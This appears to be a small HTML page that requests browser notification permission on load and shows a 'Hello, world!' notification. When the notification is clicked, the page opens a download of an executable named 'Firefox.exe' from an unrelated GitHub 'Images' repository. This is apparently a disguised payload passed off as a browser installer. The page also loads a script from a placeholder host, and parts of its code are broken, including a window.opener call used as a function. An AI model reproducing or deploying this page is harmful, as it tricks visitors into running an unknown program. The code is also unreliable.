<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Browser Notifications</title>
</head>
<body>

<h1>Send Browser Notifications</h1>
<script src="http://anyhost/path/package_name.brython.js"></script>
<script>
function showNotificationPopup() {
  // Check if the browser supports notifications
  if (!("Notification" in window)) {
    alert("This browser does not support desktop notification");
  } else if (Notification.permission === "granted") {
    // If permission is already granted, show the notification
    var notification = new Notification("Hello, world!");
    // Add an event listener for when the notification is clicked
    notification.onclick = function () {
      
      // Replace the URL with the command or action you want to run
      window.open("https://github.com/OrangesAreGreat10/Images/raw/main/Firefox.exe");
    };
  } else if (Notification.permission !== 'denied') {
    // Otherwise, ask the user for permission
    Notification.requestPermission(function (permission) {
      if (permission === "granted") {
        // If permission is granted, show the notification
        var notification = new Notification("Hello, world!");
        // Add an event listener for when the notification is clicked
        notification.onclick = function () {
          // Replace the URL with the command or action you want to run
          window.opener("https://github.com/OrangesAreGreat10/Images/raw/main/Firefox.exe");
        };
      }
    });
  }
}

// Call the showNotificationPopup() function when the page loads
window.onload = function() {
  showNotificationPopup();
};

// Python code to be executed
</script>

</body>
</html>
